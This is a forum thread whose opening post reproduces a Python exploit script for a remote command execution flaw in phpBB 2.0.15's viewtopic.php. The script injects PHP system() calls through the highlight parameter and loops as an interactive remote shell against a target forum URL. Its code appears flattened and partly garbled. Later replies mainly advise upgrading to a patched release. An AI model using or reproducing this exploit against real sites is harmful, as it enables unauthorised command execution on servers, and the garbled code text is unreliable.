Jump to content
xisto Community
Sign in to follow this  
RemoteConnection

[exploit] Phpbb 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit

Recommended Posts

phpBB 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit


ENDTAG = '</g0>'

def makecmd(cmd) linenums:0'>#!/usr/bin/pyth0nprint "\nphpBB 2.0.15 arbitrary command execution eXploit" print " 2005 by rattle@awarenetwork.org" print " well, just because there is none." import sys from urllib2 import Request, urlopenfrom urlparse import urlparse, urlunparsefrom urllib import quote as quote_plusINITTAG = '<g0>'ENDTAG = '</g0>'def makecmd(cmd):return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))_ex = "%sviewtopic.php?t=%s&highlight=%%27."_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."_ex += "printf(" + makecmd(ENDTAG) + ").%%27"def usage():print """Usage: %s <forum> <topic>forum - fully qualified url to the forumexample: % sys.argv[0]; sys.exit(1)if __name__ == '__main__':if len(sys.argv) < 3 or not sys.argv[2].isdigit():usage()else:printurl = sys.argv[1]if url.count("://") == 0: url = "http://" + urlurl = list(urlparse(url))host = url[1]if not host: usage()if not url[0]: url[0] = 'http'if not url[2]: url[2] = '/'url[3] = url[4] = url[5] = ''url = urlunparse(url)if url[-1] != '/': url += '/'topic = quote_plus((sys.argv[2]))while 1:try:cmd = raw_input("[%s]$ " % host).strip()if cmd[-1]==';': cmd=cmd[:-1]if (cmd == "exit"): breakelse: cmd = makecmd(cmd)out = _ex % (url,topic,cmd)try: ret = urlopen(Request(out)).read()except KeyboardInterrupt: continueexcept: passelse:ret = ret.split(INITTAG,1)if len(ret)>1: ret = ret[1].split(ENDTAG,1)if len(ret)>1:ret = ret[0].strip();if ret: print retcontinue;print "EXPLOIT FAILED"except:continue

Edited by cmatcmextra (see edit history)

Share this post


Link to post
Share on other sites

YOu could give secutiry updates link of phpbb dot com homepage. Not only phpbb 2.0.15 has security exploits even 2.0.16 also has one or more problem and phpbb has already released 2.0.17 sometime ago fixing all the exploits found so far and have advised all the software users to upgrade their forums/boards as soon as possible. I was updating one of the boards from 2.0.10 to 2.0.17 it took more than 2 hours to finish all the updates and now I can sleep peacefully. Those who haven't updated their boards can look for upgrade mods which is good for those who installed many mods in their boards. Look out for those mods from phpbb dot come homepage.

Share this post


Link to post
Share on other sites

its amazing i don't know whos coming out with more bugs ipb or phpbb, but yeah you let those at phpbb know about this as well.

Share this post


Link to post
Share on other sites

As with all other software and scripts, PHPbb also has a long history of vulnerabilities. But it is better than others because of quick developer community reponce towards new found security loopholes.PHPbb issues are fixed generally very less time then other systems. and that is why I like PHPbb.For the user, it is always a good practice to bookmark the PHPbb homepage to get the update news at time.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.